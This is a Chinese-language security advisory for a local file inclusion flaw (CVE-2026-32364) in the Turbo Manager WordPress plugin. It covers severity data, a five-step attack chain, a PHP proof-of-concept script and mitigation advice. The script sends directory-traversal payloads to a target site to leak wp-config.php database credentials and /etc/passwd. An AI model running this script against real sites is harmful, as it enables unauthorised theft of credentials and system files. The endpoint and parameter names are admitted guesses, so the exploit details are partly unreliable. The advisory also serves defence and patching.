CVE-2026-32364 Turbo Manager WordPress插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2026-32364

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

redqteam Turbo Manager (WordPress插件)

漏洞概述

CVE-2026-32364是存在于redqteam Turbo Manager WordPress插件中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP本地文件包含(Local File Inclusion, LFI)类型，源于应用程序对文件名参数缺乏适当的验证和控制机制。攻击者可以通过构造恶意请求，利用不安全的文件包含函数(如include、require、include_once或require_once)来包含服务器上的本地文件。在特定条件下，攻击者甚至可能结合目录遍历技术读取敏感文件(如/etc/passwd、wp-config.php等)或通过包含恶意文件实现远程代码执行。由于该漏洞需要低权限即可利用，且无需用户交互即可发起攻击，因此具有较高的实际威胁性。该漏洞影响了Turbo Manager 4.0.8之前的所有版本，漏洞发现者为PatchStack安全团队的[email protected]。

技术细节

该漏洞的根本原因在于Turbo Manager插件中的PHP代码未对用户可控的文件路径参数进行充分的输入验证和安全性检查。攻击者可以通过HTTP请求中的特定参数(如file、page、template等常见参数名)注入恶意路径，利用目录遍历技术(如../../)访问web根目录之外的文件。在PHP配置允许的情况下(如allow_url_include=On且使用file://协议)，攻击者甚至可能包含远程文件实现RCE。典型的利用场景包括：1)使用绝对路径直接访问系统文件；2)使用相对路径配合../进行目录遍历；3)利用null字节注入截断文件扩展名(如evil.php%00)。防御措施包括：对所有文件包含路径进行白名单验证、使用basename()和realpath()进行规范化、禁用不必要的PHP配置选项、以及升级到修复版本4.0.8。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站使用的WordPress版本，并确认是否安装了Turbo Manager插件。通过查看页面源代码、插件目录或使用wpscan等工具进行探测。

STEP 2

步骤2: 漏洞探测

攻击者访问Turbo Manager插件的易受攻击的端点(如/turbo-manager/includes/controller.php或类似路径)，尝试通过参数(如file、page、template)传递文件路径参数。

STEP 3

步骤3: 路径遍历测试

利用目录遍历技术(如../../../../wp-config.php)测试服务器是否返回包含的文件内容。如果插件存在LFI漏洞，将返回目标文件的内容。

STEP 4

步骤4: 敏感文件读取

成功利用后，攻击者读取敏感配置文件(如wp-config.php获取数据库凭证、SSH密钥、日志文件等)或系统文件(如/etc/passwd)。

STEP 5

步骤5: 权限提升与远程代码执行(可选)

如果PHP的allow_url_include配置为On，攻击者可包含托管在远程服务器上的恶意PHP文件，实现远程代码执行。或者通过读取的凭据进一步渗透系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2026-32364 PoC - Turbo Manager LFI Vulnerability
 * Affected: Turbo Manager < 4.0.8
 * Type: Local File Inclusion
 * 
 * Usage: php cve-2026-32364_poc.php <target_url> <vulnerable_param>
 * Example: php cve-2026-32364_poc.php http://target.com/wordpress/ file
 */

class TurboManagerLFI {
    private $targetUrl;
    private $paramName;
    private $wordpressPaths = [
        '../../../../wp-config.php',
        '../../../../etc/passwd',
        '../../../../../../etc/passwd',
        '../wp-config.php',
        'wp-config.php'
    ];
    
    public function __construct($targetUrl, $paramName = 'file') {
        $this->targetUrl = rtrim($targetUrl, '/');
        $this->paramName = $paramName;
    }
    
    public function exploit() {
        echo "[*] CVE-2026-32364 Turbo Manager LFI PoC\n";
        echo "[*] Target: {$this->targetUrl}\n";
        echo "[*] Parameter: {$this->paramName}\n\n";
        
        foreach ($this->wordpressPaths as $path) {
            echo "[*] Testing path: {$path}\n";
            $payload = urlencode($path);
            $url = "{$this->targetUrl}/?{$this->paramName}={$payload}";
            
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 30);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            
            $response = curl_exec($ch);
            $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            
            if ($httpCode == 200 && !empty($response)) {
                // Check for sensitive content indicators
                if (strpos($response, 'DB_NAME') !== false || 
                    strpos($response, 'root:x:') !== false) {
                    echo "[!] VULNERABLE! Sensitive file leaked:\n";
                    echo substr($response, 0, 500) . "...\n";
                    return true;
                }
            }
        }
        
        echo "[*] Basic tests completed. Manual verification recommended.\n";
        return false;
    }
    
    public function generateReport() {
        return [
            'cve_id' => 'CVE-2026-32364',
            'vulnerability' => 'Local File Inclusion in Turbo Manager',
            'severity' => 'HIGH',
            'cvss_score' => 7.5,
            'affected_versions' => '< 4.0.8',
            'remediation' => 'Upgrade to Turbo Manager 4.0.8 or later'
        ];
    }
}

// CLI execution
if (php_sapi_name() === 'cli' && isset($argv[1])) {
    $poc = new TurboManagerLFI($argv[1], $argv[2] ?? 'file');
    $poc->exploit();
}
?>

影响范围

Turbo Manager < 4.0.8

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1)限制用户对Turbo Manager插件的访问权限；2)在Web服务器层面添加规则阻止包含../等目录遍历字符的请求；3)禁用不必要的PHP函数如allow_url_include；4)对wp-config.php等敏感文件添加.htaccess保护；5)考虑暂时禁用Turbo Manager插件直到完成升级。同时建议检查Web服务器访问日志，排查是否存在可疑的文件包含请求。